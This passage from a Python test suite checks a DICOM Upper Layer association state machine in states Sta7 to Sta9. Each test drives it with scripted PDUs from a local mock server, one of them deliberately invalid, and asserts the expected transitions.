self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
#primitive = self.assoc.dul.receive_pdu(wait=False)
#assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15'
]
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta8')
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt10']
def test_evt11(self):
"""Test Sta8 + Evt11."""
# Sta8 + Evt11 -> <ignore> -> Sta8
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt11']
def test_evt12(self):
"""Test Sta8 + Evt12."""
# Sta8 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # get a_assoc_rq
('send', a_associate_ac),
('send', a_release_rq),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt12']
def test_evt13(self):
"""Test Sta8 + Evt13."""
# Sta8 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt13']
def test_evt14(self):
"""Test Sta8 + Evt14."""
# Sta8 + Evt14 -> AR-4 -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
# AR-4: Send A-RELEASE-RP PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt14']
def test_evt15(self):
"""Test Sta8 + Evt15."""
# Sta8 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == [
'Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt15'
]
def test_evt16(self):
"""Test Sta8 + Evt16."""
# Sta8 + Evt16 -> AA-3 -> Sta13
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt16']
def test_evt17(self):
"""Test Sta8 + Evt17."""
# Sta8 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt17']
def test_evt18(self):
"""Test Sta8 + Evt18."""
# Sta8 + Evt18 -> <ignore> -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt18']
def test_evt19(self):
"""Test Sta8 + Evt19."""
# Sta8 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('send', b'\x08\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState09(TestStateBase):
"""Tests for State 09: Release collision req - awaiting A-RELEASE (rp)."""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta9')
def test_evt01(self):
"""Test Sta9 + Evt1."""
# Sta9 + Evt1 -> <ignore> -> Sta9
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta9 + Evt2."""
# Sta9 + Evt2 -> <ignore> -> Sta9
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta9 + Evt3."""
# Sta9 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_associate_ac), # trigger event
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt3'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta9 + Evt4."""
# Sta9 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq),
('send', a_associate_rj),
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:6] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt4'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta9 + Evt5."""
# Sta9 + Evt5 -> <ignore> -> Sta9
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta9 + Evt6."""
# Sta9 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
